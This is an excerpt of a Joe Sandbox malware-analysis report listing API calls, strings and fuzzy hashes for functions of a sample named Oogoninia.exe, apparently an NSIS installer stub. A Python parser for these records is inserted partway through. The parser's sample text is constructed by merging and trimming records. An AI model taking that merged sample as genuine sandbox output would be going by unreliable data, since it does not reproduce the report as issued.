• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                    • String ID: C:\Users\user\slavelivets
                                                                                                                                                                                    • API String ID: 123533781-1403250623
                                                                                                                                                                                    • Opcode ID: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                                                                                                                                                    • Instruction ID: 3b959fe0d73b6f2ff8ba1a3dad26e84ad0429d5bc67268e837327fa781b0949d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                                                                                                                                                    • Instruction Fuzzy Hash: 705116B5E00208BFCB00DFE4C988A9DBBB6EF48314B2445AAF515FB2D1DA799941CB54
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040271A
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
• Instruction ID: 3ccff3199aeab2db1e2dd923352da36f4292fa18247536f83ce369c7762b159a
• Opcode Fuzzy Hash: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
• Instruction Fuzzy Hash: 76F05572604110EFD700EBA49A089FEB768DF15324FA0407BF181F20C0CBBC8A429B2A
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AEE
• ShowWindow.USER32(?), ref: 00403B0B
• DestroyWindow.USER32 ref: 00403B1F
• SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B3B
• GetDlgItem.USER32(?,?), ref: 00403B5C
• SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B70
• IsWindowEnabled.USER32(00000000), ref: 00403B77
• GetDlgItem.USER32(?,00000001), ref: 00403C25
• GetDlgItem.USER32(?,00000002), ref: 00403C2F
• SetClassLongA.USER32(?,000000F2,?), ref: 00403C49
• SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C9A
• GetDlgItem.USER32(?,?), ref: 00403D40
• ShowWindow.USER32(00000000,?), ref: 00403D61
• EnableWindow.USER32(?,?), ref: 00403D73
• EnableWindow.USER32(?,?), ref: 00403D8E
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DA4
• EnableMenuItem.USER32(00000000), ref: 00403DAB
• SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DC3
• SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403DD6
• lstrlenA.KERNEL32(0079E540,?,0079E540,Leafier Setup), ref: 00403DFF
• SetWindowTextA.USER32(?,0079E540), ref: 00403E0E
• ShowWindow.USER32(?,0000000A), ref: 00403F42
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID: @y$Leafier Setup
• API String ID: 184305955-2170679728
• Opcode ID: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
• Instruction ID: 1a58b870ca21ce47ba752d56327be38b30dd2316994c96cb4837d6e7696a1104
• Opcode Fuzzy Hash: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
• Instruction Fuzzy Hash: 81C1AF71904201ABEB216F61ED89E2A7EBCEB4570AF40853EF601B11F1C73DA941DB1E
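Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small parser for the per-function "APIs" / "Memory Dump Source" / "Similarity" records printed in this section, so the call sites, resolved string arguments and fuzzy hashes can be pulled out of a text export and pivoted on across reports. The sample text below is constructed from lines of the records above (the repeated Associated list is cut to one entry and the API lists of the dialog functions are merged into a single record to keep it short); the record layout and the "$"-separated String ID convention are assumed from what is visible on this page.

```python
"""Parse Joe Sandbox per-function APIs / Similarity records out of a report text export."""
import re
from dataclasses import dataclass, field

# Constructed sample: lines copied from the function records on this report page.
# The repeated "Associated:" dump list is trimmed and the API lists of the two
# dialog functions are merged into one record to keep the sample short.
SAMPLE = """\
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040271A
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Instruction Fuzzy Hash: 76F05572604110EFD700EBA49A089FEB768DF15324FA0407BF181F20C0CBBC8A429B2A
APIs
• DestroyWindow.USER32 ref: 00403B1F
• lstrlenA.KERNEL32(0079E540,?,0079E540,Leafier Setup), ref: 00403DFF
• ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 004042DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID: @y$Leafier Setup
• API String ID: 184305955-2170679728
• Instruction Fuzzy Hash: 81C1AF71904201ABEB216F61ED89E2A7EBCEB4570AF40853EF601B11F1C73DA941DB1E
"""

SECTION_LABELS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(arg,arg), ref: 0040271A"; the argument list is absent for some calls
API_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")          # "• Key: value"
HEX_WORD = re.compile(r"-?[0-9A-Fa-f]{8}")             # a raw (possibly negative) 32-bit argument


@dataclass
class ApiRef:
    api: str
    module: str
    args: tuple
    ref: int            # address of the call site inside the dump


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    @property
    def strings(self):
        """String ID lists the referenced strings joined with '$' (assumed from this page)."""
        return [s for s in self.meta.get("String ID", "").split("$") if s]


def parse_function_records(text):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = re.sub(r"\s*Download File$", "", raw.strip())   # drop the link residue
        if not line:
            continue
        if line in SECTION_LABELS:
            section = line
            if line == "APIs":                 # every function record opens with its API list
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None:                    # text before the first complete record
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            current.apis.append(ApiRef(m["api"], m["mod"], args, int(m["ref"], 16)))
            continue
        kv = KV_RE.match(line)
        if kv:
            key, value = kv.group(1).strip(), kv.group(2).strip()
            if key == "Associated":            # repeated per record; keep as a list
                current.meta.setdefault(key, []).append(value)
            else:
                current.meta[key] = value
    return records


def functions_calling(records, api_name):
    return [r for r in records if any(a.api == api_name for a in r.apis)]


def modules_used(record):
    return sorted({a.module for a in record.apis})


def string_args(record):
    """Literal arguments the sandbox resolved (anything that is not a hex word or '?')."""
    return [a for call in record.apis for a in call.args if a != "?" and not HEX_WORD.fullmatch(a)]


RECORDS = parse_function_records(SAMPLE)

if __name__ == "__main__":
    for r in RECORDS:
        print(r.meta.get("Instruction Fuzzy Hash", "")[:16], modules_used(r), string_args(r), r.strings)
```

The "Instruction Fuzzy Hash" and "Opcode Fuzzy Hash" values are the fields listed under Similarity, so collecting them per record is the natural key for comparing this NSIS stub against other reports; `string_args` surfaces the resolved literals ("open", "Leafier Setup") that the API ID alone hides.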
APIs
• CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404159
• GetDlgItem.USER32(00000000,000003E8), ref: 0040416D
• SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040418B
• GetSysColor.USER32(?), ref: 0040419C
• SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041AB
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041BA
• lstrlenA.KERNEL32(?), ref: 004041BD
• SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004041CC
• SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004041E1
• GetDlgItem.USER32(?,0000040A), ref: 00404243
• SendMessageA.USER32(00000000), ref: 00404246
• GetDlgItem.USER32(?,000003E8), ref: 00404271
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042B1
• LoadCursorA.USER32(00000000,00007F02), ref: 004042C0
• SetCursor.USER32(00000000), ref: 004042C9
• ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 004042DC
• LoadCursorA.USER32(00000000,00007F00), ref: 004042E9
• SetCursor.USER32(00000000), ref: 004042EC
• SendMessageA.USER32(00000111,00000001,00000000), ref: 00404318
• SendMessageA.USER32(00000010,00000000,00000000), ref: 0040432C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                    • String ID: Call$N$open
                                                                                                                                                                                    • API String ID: 3615053054-2563687911
                                                                                                                                                                                    • Opcode ID: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                                                                                                                                                    • Instruction ID: 601bc5fe35b3c5de407f3786c3433e5d67f1b6e9b87549a619d2750a8ed94523
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B61A5B1A40209BFEB109F61CC45F6A7B79FB84705F108026FB05BA2D1C7B8A951CF58
APIs
• DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectA.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,?), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextA.USER32(00000000,Leafier Setup,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F$Leafier Setup
• API String ID: 941294808-118588945
• Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
• Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
• Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
• Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
APIs
• lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405C7C,?,?), ref: 00405AF8
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C7C,?,?), ref: 00405B1C
• GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405B25
  • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
  • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
• GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405B42
• wsprintfA.USER32 ref: 00405B60
• GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B9B
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405BAA
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
• SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405C38
• GlobalFree.KERNEL32(00000000), ref: 00405C49
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405C50
  • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 00405A17
  • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
• String ID: %s=%s$NUL$[Rename]
• API String ID: 222337774-4148678300
• Opcode ID: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
• Instruction ID: 1eed59494e777df17b5db6228b66ba1829f219dd2eba3e9b173e6ae731b9f24b
• Opcode Fuzzy Hash: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
• Instruction Fuzzy Hash: 503125B0A08B05ABE6203B615D48F6B3A5CDF45794F14053BFE01F62D2DA7CAC408EAD
APIs
• CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Oogoninia.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
• CharNextA.USER32(?,?,?,00000000), ref: 00406070
• CharNextA.USER32(?,"C:\Users\user\Desktop\Oogoninia.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
• CharPrevA.USER32(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
Strings
• *?|<>/":, xrefs: 00406053
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040600C
• "C:\Users\user\Desktop\Oogoninia.exe", xrefs: 00406047
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 589700163-566200678
                                                                                                                                                                                    • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                                                                                    • Instruction ID: 5800177166b7667d3eaf53a22357e4554d28550b3292ec339307e94a63baae70
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5011276184479129FB3296384C00B7B6FD94F567A0F19007BE9C6722C2C67C5C62836D
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 00404009
• GetSysColor.USER32(00000000), ref: 00404025
• SetTextColor.GDI32(?,00000000), ref: 00404031
• SetBkMode.GDI32(?,?), ref: 0040403D
• GetSysColor.USER32(?), ref: 00404050
• SetBkColor.GDI32(?,?), ref: 00404060
• DeleteObject.GDI32(?), ref: 0040407A
• CreateBrushIndirect.GDI32(?), ref: 00404084
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
• Instruction ID: c3620b6f473fad47e7a0c0791398936244beda297bc66feae6272bbc27e0e58c
